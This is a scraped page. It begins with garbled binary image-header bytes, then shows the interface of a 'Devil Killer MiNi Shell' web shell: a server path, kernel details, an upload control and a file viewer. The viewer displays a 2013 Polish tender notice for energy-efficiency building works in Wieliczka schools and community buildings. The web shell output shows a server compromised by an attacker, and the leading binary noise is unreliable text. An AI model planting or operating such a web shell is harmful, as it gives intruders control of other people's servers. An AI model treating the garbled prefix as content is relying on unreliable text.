JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130410/140966-N-2013.html

<p class="kh_header"><b>Wieliczka: Poprawa efektywności energetycznej obiektów edukacyjnych oraz mieszkalnych na terenie Gminy Wieliczka Działanie 7.2.</b><br>
<b>Numer ogłoszenia: 140966 - 2013; data zamieszczenia: 10.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Komunalnych w Wieliczce , ul. Słowackiego 51, 32-020 Wieliczka, woj. małopolskie, tel. 012 294 91 89, faks 012 294 91 89.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa efektywności energetycznej obiektów edukacyjnych oraz mieszkalnych na terenie Gminy Wieliczka Działanie 7.2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Część 1 - Modernizacja pawilonu przy ul. Kościuszki 51 w Wieliczce.
Przedmiotem zamówienia są roboty budowlane polegające na kontynuacji nadbudowy piętra na całym budynku, zabudowy istniejącego tarasu nad pomieszczeniem apteki a także przystosowanie istniejącej części budynku na cele dziennego ośrodka dla dzieci i młodzieży. Wykonanie klatki schodowej, instalacji wodno-kanalizacyjnej, odgromowej, elektrycznej, wykonanie kotłowni gazowej wraz z przyłączem gazu, wykonanie elewacji i roboty wykończeniowe.
Część 2 -Modernizacja budynku Przedszkola nr 2 w Wieliczce oraz modernizacja budynku Gimnazjum im. Kazimierza Wielkiego w Wieliczce 
Przedmiotem zamówienia jest montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką w budynku Przedszkola nr 2 w Wieliczce oraz modernizacja c.o., montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi przeciwpożarowych, odgrzybienie pow. ścian kotłowni, wykonanie nowych tynków i dwukrotne malowanie w budynku Gimnazjum.
Część 3- Modernizacja budynku Szkoły Podstawowej nr 2 w Wieliczce 
Przedmiotem zamówienia jest modernizacja kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami.
Część 4- Modernizacja budynku Szkoły Podstawowej w Byszycach oraz budynku Szkoły Podstawowej w Janowicach
Przedmiotem zamówienia jest wykonanie modernizacji kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami w budynku Szkoły Podstawowej w Byszycach oraz modernizacja kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami w budynku Szkoły Podstawowej w Janowicach.
Część 5- Modernizacja budynku Szkoły Podstawowej w Mietniowie, modernizacja budynku Szkoły Podstawowej w Pawlikowicach oraz modernizacja budynku Domu Ludowego w Pawlikowicach
Przedmiotem zamówienia jest: 
modernizacja c.o. wraz z armaturą, rurociągami, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych, odgrzybianie, 2-krotne malowanie ścian sufitów w budynku Szkoły Podstawowej w Mietniowie,
modernizacja instalacji c.o. w tym montaż rurociągów, montaż grzejników, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz odgrzybianie ścian, ułożenie posadzki z płytek, licowanie ścian płytkami w budynku Szkoły Podstawowej w Pawlikowicach,
modernizacja kotłowni w tym montaż kotła gazowego wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana okien z PCV - 5 komorowe z nawiewnikami i parapetami, ocieplenie stropu, wykonanie tynków wewnętrznych, wykonanie i montaż zadaszenia wejścia do kotłowni w budynku Domu Ludowego w Pawlikowicach.
Część 6- Modernizacja budynku Gimnazjum w Dobranowicach.
Przedmiotem zamówienia jest wykonanie modernizacji c.o. w tym montaż kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych, wymiana stolarki okiennej z PCV 5-komorowe z nawiewnikami wraz z parapetami, licowanie ścian płytkami, wykonanie tynków.
Część 7- Modernizacja budynku Szkoły Podstawowej w Sygneczowie oraz budynku Szkoły Podstawowej w Raciborsku.
Przedmiotem zamówienia jest:
modernizacja kotłowni w tym montaż kotła gazowego wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi stalowych przeciwpożarowych w budynku Szkoły Podstawowej w Sygneczowie
modernizacja instalacji c.o. w tym montaż rurociągów, montaż grzejników wraz z armaturą i automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz wymiana stolarki okiennej PCV 5 - komorowe z nawiewnikami, licowanie ścian płytkami, ocieplenie dachu, wykonanie zadaszenia nad wejściem w budynku Szkoły Podstawowej w Raciborsku.
Część 8- Modernizacja budynku Domu Ludowego w Małej Wsi.
Przedmiotem zamówienia jest wykonanie modernizacji c.o. w tym montaż kotłowni gazowej wraz z armaturą, rurociągami, izolacją oraz automatyką, montaż instalacji kolektorów słonecznych wraz z konstrukcją wsporczą, rurociągami, armaturą i automatyką oraz montaż drzwi aluminiowych, wymiana stolarki okiennej z PCV 5-komorowe z nawiewnikami wraz z parapetami, pokrycie dachu płytami - papa termozgrzewalna z warstwą styropianu, ocieplenie kominów.
Część 9  - Modernizacja budynku mieszkalnego wielorodzinnego w Wieliczce ul. Krakowska 35.
Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu przebudowy istniejącego nie użytkowego strychu na mieszkania (6 mieszkań), przebudowa kotłowni węglowej na gazową, wykonanie przyłącza gazowego, wykonanie elewacji oraz prac wykończeniowych.
Szczegółowy zakres zadania należy wykonać zgodnie przedmiarem robót, z projektem technicznym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót.
W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ.
Kod CPV
Część 1
45000000-7 Roboty budowlane
45262700-8 Przebudowa budynków
45262800-9 Rozbudowa budynków 
Część 2 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
Część 3 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
45421000-4 Roboty w zakresie stolarki budowlanej
Część 4 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
45421000-4 Roboty w zakresie stolarki budowlanej
Część 5 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
Część 6 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
45421000-4 Roboty w zakresie stolarki budowlanej
Część 7 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
45421000-4 Roboty w zakresie stolarki budowlanej
Część 8 
45000000-7 Roboty budowlane
45300000-0 Roboty instalacyjne w budynkach
09332000-5 Instalacje słoneczne
45421000-4 Roboty w zakresie stolarki budowlanej
Część 9
45000000-7 Roboty budowlane
45262700-8 Przebudowa budynków
45262800-9 Rozbudowa budynków 
45300000-0 Roboty instalacyjne w budynkach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8, 45.26.28.00-9, 45.30.00.00-0, 09.33.20.00-5, 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium.
1.Oferta musi być zabezpieczona wadium w wysokości: 
Część 1- 34 000,00 zł
Część 2- 15 000,00 zł
Część 3- 16 000,00 zł
Część 4- 15 000,00 zł
Część 5- 14 000,00 zł
Część 6- 10 000,00 zł
Część 7- 15 000,00 zł
Część 8-  6 000,00 zł
Część 9- 25 000,00zł
Wadium musi być wniesione do dnia 26.04.2013 r. do godz. 11:50.
2.Wadium musi obejmować okres związania ofertą.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1.w pieniądzu
2.w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3.w gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych
5.poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109. Poz.1158 z późń. zm.)
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
BS Wieliczka nr 50861900060010020084710003
Za termin wniesienia wadium uznaje się datę i godzinę wpływu środków na rachunek Zamawiającego.
Do oferty należy dołączyć kopię polecenia przelewu. W przypadku wniesienia wadium w innej formie niż w pieniądzu należy je złożyć w oryginale w Kasie ZBK w Wieliczce, ul. Słowackiego 51, pok. nr 3b w godz. 800 - 1530 lub w oryginale dołączyć do oferty. 
4. Zwrot wadium:
4.1.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem wykonawców, o których mowa w Art. 46 ust. 4a uPZP.
4.2.Zamawiający zwróci wadium wykonawcy którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego wraz z wniesieniem należytego zabezpieczenia wykonania umowy.
4.3. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert
5. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli:
5.1. wykonawca w odpowiedzi na wezwanie, o którym mowa w Art. 26 ust. 3 uPzp nie złożył dokumentów lub oświadczeń o których mowa w Art. 25 ust. 1 uPzp lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5.2. wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
6. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 4.1. jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
7. Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8. Zamawiający dopuszcza możliwość zaliczenia wadium na poczet zabezpieczenia należytego wykonania umowy przez wykonawcę, którego oferta została uznana za najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 700 000,00 zł.
Część 2 
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 400 000,00 zł.
Część 3
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 500 000,00 zł.
Część 4 
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 350 000,00 zł.
Część 5
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 350 000,00 zł.
Część 6
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 150 000,00 zł.
Część 7
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 350 000,00 zł.
Część 8
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 100 000,00 zł.
Część 9
Wykonawca musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 600 000,00 zł.
W przypadku składania ofert na więcej niż jedną część Wykonawca zobowiązany jest wykazać odpowiednio posiadanie wiedzy i doświadczenia dla każdej części zamówienia jak opisane wyżej.
Jeżeli wykonawca składa ofertę na więcej niż jedną część musi spełnić warunek posiadania wiedzy i doświadczenia i udokumentować wykonanie robót budowlanych w ilości robót nie większej niż liczba części na które składa ofertę, a sumaryczna wartość wykonanych robót budowlanych musi być nie mniejsza niż suma wartości robót wymaganych dla poszczególnych części np.:
Wykonawca składający ofertę dla Części 1, Części 2, oraz Części 3 przedmiotu zamówienia musi udokumentować wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
- jednej roboty budowlanej budowlanej polegającej na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku o wartości brutto minimum 1 600 000,00 zł,
lub
- dwóch robót budowlanych polegających na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku (ów) o ich łącznej wartości  brutto minimum 1 600 000,00 zł,
lub 
- trzech robót budowlanych polegających na wybudowaniu, przebudowie, nadbudowie, modernizacji, remoncie budynku (ów) o ich łącznej wartości brutto minimum 1 600 000,00 zł.

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków/ nie złożył dokumentów potwierdzających spełniania warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 700 000,00 zł.
Część 2:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 400 000,00 zł.
Część 3:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 500 000,00 zł.
Część 4:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 350 000,00 zł.
Część 5:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 350 000,00 zł.
Część 6:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 150 000,00zł.
Część 7:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 350 000,00 zł.
Część 8:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 100 000,00 zł.
Część 9:
Wykonawca musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 600 000,00 zł.
W przypadku składania ofert na więcej niż jedną część zamówienia, Wykonawca zobowiązany jest wykazać odpowiednio sytuację ekonomiczną i finansową dla każdej części zamówienia poprzez sumowanie wysokości posiadanego opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia dla tych części zamówienia dla których składa ofertę. np. jeżeli Wykonawca składa ofertę na 9 części zamówienia musi udokumentować posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 3 500 000,00 zł.

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków/ nie złożył dokumentów potwierdzających spełniania warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

